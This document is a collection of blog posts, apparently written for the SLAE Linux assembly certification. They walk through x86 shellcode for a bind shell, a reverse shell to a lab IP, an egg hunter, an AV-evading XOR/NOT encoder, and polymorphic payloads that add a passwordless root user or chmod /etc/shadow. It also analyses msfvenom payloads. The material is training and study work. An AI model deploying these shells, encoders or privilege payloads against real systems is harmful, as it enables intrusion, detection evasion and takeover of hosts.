Bind TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517

Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #1 - Create a Shell_BIND_TCP Shellcode

    - Binds to a port
    - Execs Shell on incoming connection
    - Port number should be easily configurable


~~~~~~~~~//*****//~~~~~~~~~



Creating a BIND_TCP shell can be broken down into 5 functions.

0x1 socket
0x2 bind
0x3 listen
0x4 accept
0x5 execve


... let us begin


0x1 - socket

First, we create a socket. socket() requires 3 arguments: domain, type, protocol as seen below.


domain = AF_INET or 0x2


type = SOCK_STREAM or 0x1


protocol = TCP or 0x6


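We will also refer to the net.h header file (linux/net.h), which defines the call numbers (SYS_SOCKET, SYS_BIND, SYS_LISTEN, SYS_ACCEPT, ...) that we pass to socketcall(), the kernel entry point that dispatches the socket-related calls.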



We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

               push 0x6
               push 0x1
               push 0x2
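As a quick sanity check on the push order, the sketch below models the stack in Python. It is an illustration only: `push` and the list-based stack are hypothetical helpers, not part of the shellcode. It shows that pushing protocol, type, domain in that order leaves the arguments in memory as domain, type, protocol, which is the layout socketcall() reads from the address in ecx.

```python
import socket
import struct

def push(stack, value):
    """Model a 32-bit x86 push: the newest dword ends up at the lowest address (esp)."""
    stack.insert(0, value)

stack = []           # index 0 plays the role of [esp]
push(stack, 0x6)     # protocol
push(stack, 0x1)     # type
push(stack, 0x2)     # domain

# The same values by name, as exposed by Python's socket module on Linux.
expected = [socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP]

# Bytes as they sit in memory starting at esp (little-endian dwords).
args_in_memory = struct.pack("<3I", *stack)
print(stack, args_in_memory.hex())
```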

Once the arguments are on the stack, we invoke the socketcall() syscall to create the socket.



             xor eax, eax             ;remove x00/NULL byte
             mov al, 0x66             ;syscall 102 (0x66) for socketcall
             xor ebx, ebx             ;remove x00/NULL byte
             mov bl, 0x1              ;net.h SYS_SOCKET 1 (0x1)
             xor ecx, ecx             ;remove x00/NULL byte
             mov ecx, esp             ;arg 2, esp address to ecx
             int 0x80                 ;interrupt/execute

             mov edi, eax             ;sockfd, stored in edi and referenced by the later calls

0x2 - bind

One common concept in the SLAE course is the use of JMP-CALL-POP, which provides a way to obtain addresses dynamically. This works because when a call instruction is executed, the address of the instruction (or data) that follows it is automatically pushed onto the stack as the return address.



          bind:
               jmp short port_to_bind

          call_bind:
               pop esi                ;pops the address of port_number into esi
               xor eax, eax           ;remove x00/NULL byte
               push eax               ;push eax NULL value to the stack (address 0.0.0.0)
               push word [esi]        ;push actual port number to the stack, word = 2 bytes
               mov al, 0x2            ;AF_INET IPv4
               push ax
               mov edx, esp           ;store stack addr (struct sockaddr)
               push 0x10              ;store addrlen (16) on stack
               push edx               ;push pointer to struct sockaddr to the stack
               push edi               ;sockfd from the eax _start
               xor eax, eax           ;remove x00/NULL byte
               mov al, 0x66           ;syscall 102 for socketcall
               mov bl, 0x02           ;net.h SYS_BIND 2 (0x02)
               mov ecx, esp           ;arg for SYS_BIND
               int 0x80               ;interrupt/execute

          port_to_bind:
               call call_bind
               port_number dw 0x5d11  ;port 4445 (0x115d)
                                      ;the address of this word gets pushed to the stack by the call instruction
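To make the byte order concrete, here is a small Python sketch of the first 8 bytes of the sockaddr structure that the pushes above build. The helper name `sockaddr_in_prefix` is made up for this illustration; it only mirrors the three pushes (address, port, family) and is not taken from the course material.

```python
import socket
import struct

def sockaddr_in_prefix(port, ip="0.0.0.0"):
    """First 8 bytes of struct sockaddr_in: family, port, address."""
    family = struct.pack("<H", socket.AF_INET)   # push ax with al = 0x2 -> bytes 02 00
    port_be = struct.pack(">H", port)            # network byte order (big-endian)
    addr = socket.inet_aton(ip)                  # 0.0.0.0 corresponds to the pushed NULL dword
    return family + port_be + addr

# `dw 0x5d11` is stored little-endian, so memory holds 11 5d, i.e. port 0x115d.
stored = struct.pack("<H", 0x5D11)
print(stored.hex(), sockaddr_in_prefix(4445).hex())
```

This is why the port appears "backwards" in the nasm file: the assembler stores the word little-endian, while the kernel reads the port field in network (big-endian) order.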

0x3 - listen


The listen() syscall is pretty straightforward.


            push 0x1                 ;int backlog
            push edi                 ;sockfd from eax _start
            xor eax, eax             ;remove x00/NULL byte
            mov al, 0x66             ;syscall 102 for socketcall
            xor ebx, ebx             ;remove x00/NULL byte
            mov bl, 0x4              ;net.h SYS_LISTEN 4
            xor ecx, ecx             ;remove x00/NULL byte
            mov ecx, esp             ;arg for SYS_LISTEN
            int 0x80                 ;interrupt/execute

0x4 - accept

Likewise, accept() is pretty straightforward.

            xor eax, eax             ;remove x00/NULL byte
            push eax                 ;push NULL value to addrlen
            xor ebx, ebx             ;remove x00/NULL byte
            push ebx                 ;push NULL value to addr
            push edi                 ;sockfd from eax _start
            mov al, 0x66             ;syscall 102 for socketcall
            mov bl, 0x5              ;net.h SYS_ACCEPT 5
            xor ecx, ecx             ;remove x00/NULL byte
            mov ecx, esp             ;arg for SYS_ACCEPT
            int 0x80                 ;interrupt/execute

0x4a - change_fd


These are the dup2() calls, which redirect stdin, stdout and stderr to the accepted connection so that everything /bin/sh reads and writes goes through the socket.

       
            mov ebx, eax                  ;moves fd from accept to ebx
            xor ecx, ecx                    ;removes 0x00/NULL byte, 0 (std in)
            xor eax, eax                   ;removes 0x00/NULL byte
            mov al, 0x3f                  ;syscall 63 for dup2
            int 0x80                         ;interrupt/execute

            mov al,0x3f                   ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 1 (std out)
            int 0x80                         ;interrupt/execute

            mov al, 0x3f                  ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 2 (std error)
            int 0x80                         ;interrupt/execute

0x5 - execve

At this point we have created our socket(), bound it to a port with bind(), started to listen() for incoming connections, and can accept() one. We are now ready to run execve(): once the connection is established, execve() is used to execute /bin/sh.


The following instructions are taken directly from the execve module of the SLAE course.

             xor eax, eax             ;removes x00/NULL byte
             push eax                 ;push first null dword (string terminator)

             push 0x68732f2f          ;hs//
             push 0x6e69622f          ;nib/

             mov ebx, esp             ;save stack pointer in ebx (pointer to /bin//sh)
             push eax                 ;push null dword as terminator
             mov edx, esp             ;moves address of the null dword into edx (empty envp)

             push ebx                 ;push pointer to /bin//sh (argv[0])
             mov ecx, esp             ;moves address of argv into ecx

             mov al, 0xb              ;syscall 11 for execve
             int 0x80
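If the reversed strings in the comments look odd, the following Python sketch (my own illustration, with a made-up helper name) rebuilds the bytes that the two pushes leave in memory. Each push stores a little-endian dword, and the last value pushed sits at the lowest address.

```python
import struct

def pushed_dwords_to_bytes(dwords):
    """Bytes in memory after pushing `dwords` in the given order.

    Each push stores a little-endian dword below the previous one, so the
    last value pushed comes first in memory.
    """
    return b"".join(struct.pack("<I", d) for d in reversed(dwords))

path = pushed_dwords_to_bytes([0x68732F2F, 0x6E69622F])
print(path)
```

The extra slash in /bin//sh pads the string to 8 bytes so it fits exactly into two dwords without a NULL byte.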


And we are done!

Testing our bind shell.

We assemble and link the nasm file, then execute it.



Then, using another machine (Kali), I connect to the Ubuntu machine, which spawns a /bin/sh shell, and we can run commands remotely.

BT IP: 192.168.199.128
Ubuntu IP: 192.168.199.129


We can also run the netstat command on the Ubuntu machine to verify the established connection between the BT and Ubuntu machines:

Success..we can see the connection established.


Finally, we use objdump to obtain the shellcode from our executable


***Note that the last 2 bytes of the shellcode are the port to bind on, stored in network byte order (0x11 0x5d for port 4445, which is why the nasm file declares the little-endian word 0x5d11). We should be able to change just the last 2 bytes of the shellcode to configure a different port to bind on.
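A minimal sketch of that port swap in Python is shown here, assuming (as in this post) that the port occupies the final two bytes of the shellcode. The function name `set_port` and the placeholder bytes are made up for the example; the real shellcode comes from the objdump output.

```python
import struct

def set_port(shellcode, port):
    """Return a copy of `shellcode` with its last two bytes replaced by `port`.

    Assumes the port is stored in the final two bytes in network byte order.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    encoded = struct.pack(">H", port)
    if b"\x00" in encoded:
        raise ValueError("port would introduce a NULL byte into the shellcode")
    return shellcode[:-2] + encoded

# Placeholder bytes standing in for the real shellcode; only the tail matters here.
demo = b"\x90\x90\x90\x90" + b"\x11\x5d"
patched = set_port(demo, 8080)
print(patched[-2:].hex())
```

The NULL-byte check is there because ports such as 256 (0x0100) would put a 0x00 into the shellcode, which is exactly what the xor tricks in the assembly are trying to avoid.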

Here's an example of using the shellcode with a .c program




We compile shellcode.c, execute it and connect to 4445 from our BT machine.



SUCCESS!






SLAE Certification

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

~~~~~~~~~//*****//~~~~~~~~~

I started my offsec journey back in Feb 2007 when I registered for Offensive Security Certified Professional (OSCP) and completed the certification in June of that same year. Almost 3 years later, I finally decided to start on Offensive Security Certified Expert (OSCE), and one of the baseline requirements for this certification is familiarity with Linux assembly language. Several OSCE preparation and exam reviews pointed to SecurityTube's Linux Assembly Expert (SLAE, 32-bit) course as good preparation for OSCE. The course is offered at an affordable price of $130, and the certification is unique: after completing the course, students are required to complete seven assignments (listed below) to obtain the certification.

SLAE Assignment #1 - Bind TCP Shell
SLAE Assignment #2 - Reverse TCP Shell
SLAE Assignment #3 - Egg Hunter
SLAE Assignment #4 - Encoder
SLAE Assignment #5 - Shellcode Analysis
SLAE Assignment #6 - Polymorphism
SLAE Assignment #7 - Crypter 

Shout out to Vivek for doing an amazing job teaching the course. It was a perfect blend of the crawl, walk, run--from learning the basics of assembly registers to operations/conditions/controls/loops, creating shellcodes, and finally creating encoders/polymorphism/crypters. 

Reverse TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #2 - Create a Shell_Reverse_TCP shellcode
      

      - Reverse connects to configured IP and Port
      - Execs shell on successful connection
      - IP and Port should be easily configurable

~~~~~~~~~~//*****//~~~~~~~~~~


Creating a REVERSE_TCP shell consists of 3 functions

0x1 socket
0x2 connect
0x3 execve



0x1 - socket

Similar to assignment #1, the first thing we need to do is set up our socket. This can be accomplished by pushing the following parameters onto the stack.

We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

                push 0x6                ;TCP or 0x6
               push 0x1               ;SOCK_STREAM or 0x1
              push 0x2               ;AF_INET or 0x2

We can then invoke the socketcall() system call, as shown below:

               xor eax, eax            ;remove x00/NULL byte
               mov al, 0x66            ;syscall 102 for socketcall
               xor ebx, ebx            ;remove x00/NULL byte
               mov bl, 0x1             ;net.h SYS_SOCKET 1 (0x1)
               xor ecx, ecx            ;remove x00/NULL byte
              mov ecx, esp            ;arg to SYS_SOCKET
              int 0x80                ;interrupt/execute


              mov edi, eax            ;sockfd, store return value of eax into edi


0x2 - connect

Once our socket is set-up, the next step is to invoke the connect() system call. This will be used to connect back to the listening machine, through the socket using an IP address and Port destination.

Below shows what we need for the connect():



One main difference between a reverse shell and a bind shell is that the reverse shell needs both the IP and the port of the listening machine. Specifically, we use 192.168.199.130 and port 4445 as the IP and port respectively. We make both available using the JMP-CALL-POP method again. We first jmp to the label that holds our IP and port. When the call instruction executes, the address of those 6 bytes (4 for the IP, followed by 2 for the port) is pushed onto the stack as the return address. The pop esi instruction then loads that address into the esi register. Finally, to split the IP and port, push dword [esi] pushes the first 4 bytes (192.168.199.130) and push word [esi+4] pushes the last two bytes (4445).

We then call the socketcall() and SYS_CONNECT.


   reverse_jump:

        jmp short reverse_ip_port


    connect:

        ;int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);


        pop esi                         ;pops the address of IP+port (total of 6 bytes) into esi
        xor eax, eax                    ;removes x00/NULL byte
        xor ecx, ecx                    ;removes x00/NULL byte
        push dword [esi]                ;push IP (first 4 bytes at esi)
        push word [esi +4]              ;push PORT (last 2 bytes at esi)
        mov al, 0x2                     ;AF_INET IPV4
        push ax
        mov eax, esp                    ;store stack address into eax (struct sockaddr)
        push 0x10                       ;store addrlen (16) on stack
        push eax                        ;push pointer to struct sockaddr to the stack
        push edi                        ;sockfd from the eax _start
        xor eax, eax                     ;removes x00/NULL byte
        mov al, 0x66                    ;syscall 102 for socketcall
        xor ebx, ebx                     ;removes x00/NULL byte
        mov bl, 0x03                    ;net.h SYS_CONNECT 3
        mov ecx, esp                    ;arg for SYS_CONNECT
        int 0x80



    reverse_ip_port:

        call connect

        reverse_ip dd 0x82c7a8c0       ;192.168.199.130, hex in little endian
        reverse_port dw 0x5d11          ;port 4445, hex in little endian
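To configure a different IP or port, the two constants have to be rewritten so that the bytes land in memory in network byte order. The Python sketch below computes them; `nasm_constants` is a hypothetical helper name for this illustration, not something from the course.

```python
import socket
import struct

def nasm_constants(ip, port):
    """Values to place after `dd` and `dw` so that memory holds network byte order."""
    ip_dd = int.from_bytes(socket.inet_aton(ip), "little")
    port_dw = int.from_bytes(struct.pack(">H", port), "little")
    return ip_dd, port_dw

ip_dd, port_dw = nasm_constants("192.168.199.130", 4445)
print(hex(ip_dd), hex(port_dw))
```

Keep in mind that an IP or port containing a zero byte (for example 10.0.0.5) would put NULL bytes into the shellcode and would need extra handling.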



0x3 - execve

Before execve() syscall can be invoked, we have to set up dup2() calls to ensure all the std in/out/error goes through the socket. We use the same technique utilized in assignment #1.

   change_fd:

        ;multiple dup2() to ensure that stdin, stdout, std error will
        ;go through the socket connection

        xor ecx, ecx            ;removes 0x00/NULL byte, 0 (std in)
        xor eax, eax            ;removes 0x00/NULL byte
        xor ebx, ebx            ;removes 0x00/NULL byte
        mov ebx, edi            ;sockfd from the eax _start
        mov al, 0x3f            ;syscall 63 for dup2
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to ecx, 1 (std out)
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to ecx, 2 (std error)
        int 0x80                ;interrupt/execute


Shell time! Shells for everyone!

This is no different from the assignment #1 shell. We use the execve() syscall to invoke /bin/sh; however, this time its std in/out/error go back to the listening machine over the connection we initiated.

  execve:
         xor eax, eax             ;removes x00/NULL byte
         push eax                   ;push first null dword

         push 0x68732f2f      ;hs//
         push 0x6e69622f      ;nib/

         mov ebx, esp             ;save stack pointer in ebx

         push eax                    ;push null dword terminator
         mov edx, esp             ;moves address of the null dword into edx (empty envp)

         push ebx                    
         mov ecx, esp          

         mov al, 0xb                ;syscall 11 for execve
         int 0x80


Testing our reverse shell

First, we start with compiling our nasm file into executable and then opening up a listener in our Kali box.




Execute the file and we get a reverse TCP connection back to our kali


SUCCESS...our reverse shell works.


We then use objdump to get our actual shellcode...


Copy the shellcode into our c file, test reverse shell again and we get another successful reverse shell to the kali listener.








Egg Hunter

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #3 - Egghunter
        

          - Create a working demo of the egg hunter

~~~~~~~~~//*****//~~~~~~~~~


For the 3rd assignment, I will be creating an 'egg hunter' shellcode. This wasn't covered in the SLAE course. As mentioned by a lot of SLAE blogs, a good source is skape's research paper. My shellcode does not deviate much from what skape has shown. I created some labels to make it more readable and to make the flow of instructions easier to follow.

What is an egg_hunter? Why do we need it?

An egg hunter is a small shellcode that searches memory for another shellcode. It is basically a staged shellcode where the egg hunter is stage one while the actual shellcode that spawns the shell (reverse, bind, meterpreter, etc.) is stage two. It is needed during exploit development (e.g. a buffer overflow) when the application only leaves a small space for shellcode: too small for the stage two shellcode, but large enough for stage one.

This is accomplished by using an 'egg', a unique 4-byte value that is written twice in a row (8 bytes in total) in front of the stage two shellcode. The egg hunter carries the same 4-byte value. When the stage one shellcode executes, it searches memory for the unique 8-byte egg and, once it is found, transfers execution control to stage two.

Here I globally defined the egg as follows and then initialized the eax, ebx, ecx, and edx registers:

       %define _EGG                    0x50905090

       xor ebx, ebx                         ;remove x00/NULL byte
       mov ebx, _EGG                        ;move 0x50905090 egg into ebx register
       xor ecx, ecx                         ;remove x00/NULL byte
       mul ecx                              ;eax * ecx (0), initializes eax and edx with 0x00000000 as well


We are now ready to do some system calls. According to skape, two system calls can be used: access() and sigaction(). For this write-up, I will only be using access().


We will be using the *pathname pointer argument to validate the address that will contain our egg.

 I globally defined two more values: the EFAULT return value (low byte) and the access() syscall number

      %define _SYSCALL_ERR       0xf2
      %define __NR_access        0x21
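For anyone wondering where 0xf2 comes from: on 32-bit Linux a failing syscall returns the negated errno in eax, and EFAULT is 14. The short Python check below (my own illustration) shows that the low byte of -14 is 0xf2, which is what the comparison against al relies on.

```python
import errno

ret = (-errno.EFAULT) & 0xFFFFFFFF   # value left in eax when access() fails with EFAULT
low_byte = ret & 0xFF                # the part that `cmp al, ...` looks at
print(hex(ret), hex(low_byte))
```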

...and created two labels: NEXT_PAGEFILE and NEXT_ADDRESS

The first label is used to move to the next page when the syscall reports an invalid memory address. Each page (PAGESIZE) contains 4096 bytes. This is accomplished using an OR instruction, which sets the low 12 bits of the address; the inc edx that follows then lands on the first byte of the next page.

NEXT_PAGEFILE:

      or dx, 0xfff                                 ;note that edx is the *pathname pointer
                                                         ;0xfff == 4095

The second label will be our meat and potatoes. Within this label or procedure, we will be calling the access(2) syscall, compare the results (egg hunting), and loop through the address space.

NEXT_ADDRESS:

        inc edx                     ;increments edx, checks next address if it contains the egg
        pusha                       ;push all general-purpose registers (eax, ebx, ecx, edx, ...)
                                    ;pushing them to the stack preserves their values across the syscall
        lea ebx, [edx +4]           ;ebx = *pathname, the address to validate
        xor eax, eax                ;remove x00/NULL byte
        mov al, __NR_access         ;syscall 33 for access(2)
        int 0x80                    ;interrupt/execute

        ;egg hunting begins

        cmp al, _SYSCALL_ERR        ;compares return value of al to 0xf2 (EFAULT)
        popa                        ;restore eax, ebx, ecx, edx (popa does not change the flags)
        jz NEXT_PAGEFILE            ;al return value == EFAULT value, invalid memory address
                                    ;move to the next PAGESIZE

        cmp [edx], ebx              ;if al return value != EFAULT value, execute this instruction
                                    ;compares the egg with the dword at edx
        jnz NEXT_ADDRESS            ;not EFAULT but _EGG not found, loop again

        cmp [edx +4], ebx           ;_EGG found, test the next 4 bytes for the _EGG
        jnz NEXT_ADDRESS            ;if next 4 bytes at edx != _EGG, loop again

        jmp edx                     ;finally, 8 bytes of _EGG found, jmp to address in edx
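The control flow of the two labels can be simulated in Python against a toy memory model. This is only a sketch under my own assumptions: `pages` is a made-up dictionary mapping page base addresses to 4096-byte blocks, a missing page stands in for the EFAULT result of access(), and `read` and `hunt` are hypothetical helper names.

```python
PAGE_SIZE = 4096
EGG = (0x50905090).to_bytes(4, "little")   # 90 50 90 50 as laid out in memory

def read(pages, addr, n):
    """Read n bytes from the toy memory, or None if any byte is unmapped."""
    out = bytearray()
    for a in range(addr, addr + n):
        page = pages.get(a & ~(PAGE_SIZE - 1))
        if page is None:
            return None
        out.append(page[a & (PAGE_SIZE - 1)])
    return bytes(out)

def hunt(pages, limit):
    """Return the address of the doubled egg, or None if it is not below `limit`."""
    addr = 0
    while addr < limit:
        if (addr & ~(PAGE_SIZE - 1)) not in pages:
            addr = (addr | (PAGE_SIZE - 1)) + 1   # NEXT_PAGEFILE: skip to the next page
            continue
        if read(pages, addr, 8) == EGG * 2:       # both 4-byte halves match
            return addr
        addr += 1                                 # NEXT_ADDRESS: try the next byte
    return None

# One mapped page at 0x3000 with the doubled egg 100 bytes in, then filler bytes.
body = bytes(100) + EGG * 2 + b"\xcc" * 8
pages = {0x3000: body.ljust(PAGE_SIZE, b"\x00")}
print(hex(hunt(pages, 0x10000)))
```

Skipping a whole page on an invalid address is what keeps the search fast: unmapped regions cost one check per 4096 bytes instead of one per byte.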

We compile our nasm file and obtain our shellcode using objdump.


We now have our stage one shellcode and for the stage two shellcode, I will be using the reverse TCP shellcode from SLAE Assignment #2.

I updated the shellcode.c file to include both stage one and stage two shellcodes as seen below.



For testing, I am using my kali box again to receive the reverse TCP shell. We compile our shellcode.c, open a listener in Kali and run the exploit.



SUCCESS!!



Shellcode Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #4 - Encoder
 - Create a custom encoding scheme


~~~~~~~~~//*****//~~~~~~~~~



For this assignment, we will be encoding an execve shellcode that spawns /bin/sh, using XOR and then NOT encoding. The idea behind encoding is that we can alter the opcodes without altering the shellcode's functionality. For instance, in the shellcode below it is pretty clear that our shellcode contains \x2f\x2f\x73\x68\x2f\x62\x69\x6e, which translates to //sh/bin (the two dwords pushed to build /bin//sh). Among other things, this is something that could be easily caught by Anti-virus (AV) or an Intrusion Detection System (IDS).

Below is the original execve-stack.nasm file and its corresponding opcodes/shellcode.






Once we get the original shellcode...I used python for encoding which will be a two-step process: XOR encoding first, then NOT encoding the result of the first step.

Here we initialize it with our original shellcode from execve-stack.nasm file:


The first step is the  XOR encoding. For this step, I am going through each byte of the original shellcode and XOR'ng it with 0xaa.


The second step is to encode each byte of the result from XOR encoding, with a NOT encoding.




Below is the output of the encoder python script. I am printing both XOR and NOT encoded shellcodes however, we will only need the NOT encoded shellcode for our decoder.



With the 'XOR then NOT' encoded shellcode, we are now ready to create our decoder to revert or decode it back to the original shellcode.

For this step, I am using the JMP-CALL-POP method again. The call instruction pushes the address of the encoded shellcode onto the stack. We then pop that address into a register (esi for this one). We can then loop through each byte of the encoded shellcode that esi points to.

We first do a NOT then followed by XOR 0xaa.

Below shows the encoding and decoding scheme for the first byte

encoding: 0x31---> 0x9b (0x31 XOR 0xaa) -----> 0x64 (NOT 0x9b & 0xff)
decoding: 0x64---> 0x9b (NOT 0x64 & 0xff) ---> 0x31 (0x9b XOR 0xaa)
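The scheme above can be reproduced with a few lines of Python. This is a minimal sketch rather than the exact script from the repository: the function names are my own, and `sample` is just the first three bytes of an execve shellcode (xor eax, eax; push eax) used as test input.

```python
KEY = 0xAA

def encode(shellcode, key=KEY):
    """XOR each byte with `key`, then NOT the result (kept to 8 bits)."""
    return bytes((~(b ^ key)) & 0xFF for b in shellcode)

def decode(encoded, key=KEY):
    """Reverse order: NOT first, then XOR with `key`."""
    return bytes(((~b) & 0xFF) ^ key for b in encoded)

sample = bytes([0x31, 0xC0, 0x50])   # xor eax, eax ; push eax
encoded = encode(sample)
print(", ".join(f"0x{b:02x}" for b in encoded))
```

One design note: NOT(x XOR 0xaa) is the same as x XOR 0x55, so the two steps collapse into a single XOR mathematically. Keeping them as two separate instructions in the decoder still changes the byte pattern of the stub.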

...and here's the complete nasm file with our decoder.



We compile then generate a new shellcode using objdump.


We update our shellcode.c file, compile it and execute.

Note that the new shellcode shows that we can 'hide' the //bin/sh string while maintaining the functionality.


SUCCESS!


Shellcode Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #5 - Analysis of Linux/x86 msfpayload shellcodes

          - Use GDB/ndisasm/libemu to dissect the functionality of the shellcode


~~~~~~~~~//*****//~~~~~~~~~


For this assignment, I will be using the first three Linux/x86 payloads generated by msfvenom (formerly msfpayload)


0x1 - linux/x86/adduser


A quick ndisasm gives us the following:

msfvenom -p linux/x86/adduser -f raw | ndisasm -u -



The first obvious ones are the 3 dwords:

           push dword 0x64777373
           push dword 0x61702f2f
           push dword 0x6374652f

These dwords (in little-endian) are the hex representation of /etc//passwd.
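The conversion is easy to verify in Python. The snippet below is my own check, not output from the original analysis: it takes the three pushed dwords in the order ndisasm lists them and rebuilds the string as it ends up in memory.

```python
pushes = [0x64777373, 0x61702F2F, 0x6374652F]   # in the order ndisasm lists them

# The last push sits at the lowest address, so read the list back to front.
text = b"".join(d.to_bytes(4, "little") for d in reversed(pushes)).decode("ascii")
print(text)
```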


However, it is still unclear as to what is being done to the /etc//passwd file. I think this is where we can use gdb to see what system calls are being invoked.

I generated the shellcode from msfvenom, loaded it in shellcode.c, compiled and loaded in gdb.




Once loaded in gdb...we first set a breakpoint for shellcode: break *&code 



We can see again the /etc//passwd in lines +15, +20, +25. We can also see several int 0x80 (lines +7, +35, +86, +91) for the system calls. We can add breakpoints on these lines to see what system calls are loaded into eax. 


Note: Here is a list of all the system calls with their corresponding call numbers found in /usr/include/i386-linux-gnu/asm/unistd_32.h
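When stepping through breakpoints it helps to have the numbers at hand. The lookup below is a small Python sketch containing only the i386 syscall numbers that come up in these posts; the dictionary and the helper name `name_of` are made up for this illustration, and the header file remains the authoritative list.

```python
# Subset of i386 syscall numbers mentioned across these posts.
SYSCALLS_I386 = {
    1: "exit", 4: "write", 5: "open", 11: "execve", 15: "chmod",
    33: "access", 46: "setgid", 63: "dup2", 102: "socketcall",
}

def name_of(eax):
    """Translate the value seen in eax at an int 0x80 into a syscall name."""
    return SYSCALLS_I386.get(eax, f"unknown ({eax})")

print(name_of(0x2E))
```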


Syscall #1:  eax has 46 or setgid() loaded to it.



The setgid() call is pretty straightforward. This call sets the group ID of the calling process. In this case, the group ID is set to 0 as seen in the first two lines. The call requires only one argument; here 0 is loaded into ebx (mov ebx, ecx) as that argument.

                   root@kali:~/SLAE# id
                   uid=0(root) gid=0(root) groups=0(root)



                   
Syscall #2: eax has 5 or open() loaded to it.


open() here opens /etc/passwd file for the pathname and sets the flags to O_RDWR (Read/Write). This step will require root access hence why setgid()  was called first and set the user's group id to 0.

                      
                             push   0x64777373
                             push   0x61702f2f
                             push   0x6374652f




Syscall #3: eax has 4 or write() loaded to it.


write() has 3 arguments (fd, *buf, count). It writes up to count bytes from the buffer pointed to by buf to the file referred to by the file descriptor fd.



The following is what gets written into the /etc/passwd file.
USER=test
PASS=password (in this case it is hashed)
SHELL=/bin/bash



syscall #4: eax has 1 or exit() loaded to it....enough said.




0x2 - linux/x86/chmod

We again generate a shellcode with the following options:

FILE=/home/slae/test.txt
MODE=0777





Compile and we load the file in gdb.


We put a breakpoint at the system  call @ +37 (0x804a065)

Syscall: eax has 15 or chmod() loaded to it.



chmod() requires two arguments: pathname and mode

pathname: /home/slae/test.txt (ebx)



mode: 0777 (ecx) 

Here we can see 0x1ff (0777) pushed to the stack and popped into ecx
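The hex value in the disassembly and the octal mode passed to msfvenom are the same number. The short Python check below is my own addition; `stat.filemode` renders the mode the way ls would show it for a regular file.

```python
import stat

mode = 0x1FF
print(oct(mode), stat.filemode(stat.S_IFREG | mode))
```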


0x3 - linux/x86/exec

We generate a shellcode with the following option:

CMD=ifconfig



Compile and load it in gdb


We put a breakpoint at the system call @ +42 (0x0804a06a)

syscall: eax has 11 or execve() loaded to it.



Here we see the first part of the string for the command /bin/sh -c loaded into ebx.





The next string should be ifconfig, however, I couldn't find it using gdb. I ended up using ndisasm for this next step.

 
Call dword 0x26 is what we are looking for. Looking at 1D to 24, we can see that these are the opcodes for ifconfig. 


Furthermore, plugging the next opcodes (26 through 29) shows how the entire command string (/bin/sh -c ifconfig) is pushed into the stack (esp), and loaded into ecx




Thank you for reading.

Shellcode Polymorphism

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
GitHub:

SLAE Assignment #6 - Polymorphic
     - Create a polymorphic version of 3 shellcodes from Shell-Storm
     - The polymorphic versions cannot be larger than 150% of the existing shellcode
     - Bonus: points for making it shorter in length than original



~~~~~~~~~//*****//~~~~~~~~~


0x1 - add root user (r00t) with no password to /etc/passwd
link: www.shell-storm.org/shellcode/files/shellcode-211.php

Original shellcode, disassembled using ndisasm



For this, we can focus on lines 6, B, 15 and 25, 2A, 2F. These instructions correspond to the two syscalls: open() and write(). open() opens /etc//passwd and write() writes r00t::0:0:::. I was able to change the values by running add and sub operations. I could have changed r00t::0:0::: as well using XOR operations or by replacing the push instructions with mov instructions; however, I would have exceeded the limit of 150% of the original shellcode size.





0x2 - chmod (/etc/shadow, 0777)
link: www.shell-storm.org/shellcode/files/shellcode-593.php

Here's the original shellcode, 29 bytes in size, disassembled using ndisasm. Similar to 0x1, lines 3, 8, and D show the file name /etc//shadow, which means this will be the focus of the polymorphism process. Line 14 shows the permission 0777, which could also be polymorphed using some add or sub instructions, but I didn't do it because of the 150% shellcode size requirement.



For the polymorphism, I used a combination of the technique from 0x1 and the JMP-CALL-POP technique. I subtracted 0x11111111 from each dword and then dynamically loaded the new values onto the stack. After they are popped, I add 0x11111111 to recover the original values before they are pushed back onto the stack. The size of the new shellcode is 44 bytes.
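The arithmetic can be sketched in Python as follows. The helper names are my own, and the dwords are derived from the string /etc//shadow rather than copied from the shellcode listing, so treat this as an illustration of the add/sub idea and not as the exact values in the nasm file.

```python
MASK = 0xFFFFFFFF
DELTA = 0x11111111

def to_dwords(data):
    """Split a byte string (length a multiple of 4) into little-endian dwords."""
    return [int.from_bytes(data[i:i + 4], "little") for i in range(0, len(data), 4)]

def disguise(dwords):
    """Values stored in the shellcode: original minus DELTA, wrapped to 32 bits."""
    return [(d - DELTA) & MASK for d in dwords]

def recover(dwords):
    """What the shellcode does at run time: add DELTA back."""
    return [(d + DELTA) & MASK for d in dwords]

original = to_dwords(b"/etc//shadow")
stored = disguise(original)
print([hex(d) for d in stored])
```

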